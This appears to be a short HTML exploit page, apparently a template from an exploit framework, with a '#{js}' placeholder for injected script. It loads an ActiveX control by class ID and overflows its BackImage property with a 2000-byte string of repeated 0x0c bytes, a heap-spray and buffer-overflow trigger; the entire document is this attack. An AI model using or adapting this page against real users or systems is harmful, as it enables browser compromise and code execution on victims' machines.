<html>
    <head>
    <script>
    #{js}
    </script>
    </head>
    <body>
    <object classid='clsid:13149882-F480-4F6B-8C6A-0764F75B99ED' id='target'></object>
    <script>
    var arg = "\x0c";
    while (arg.length < 2000) arg += arg;
    target.BackImage = arg.substring(0, 2000);
    </script>
    </html>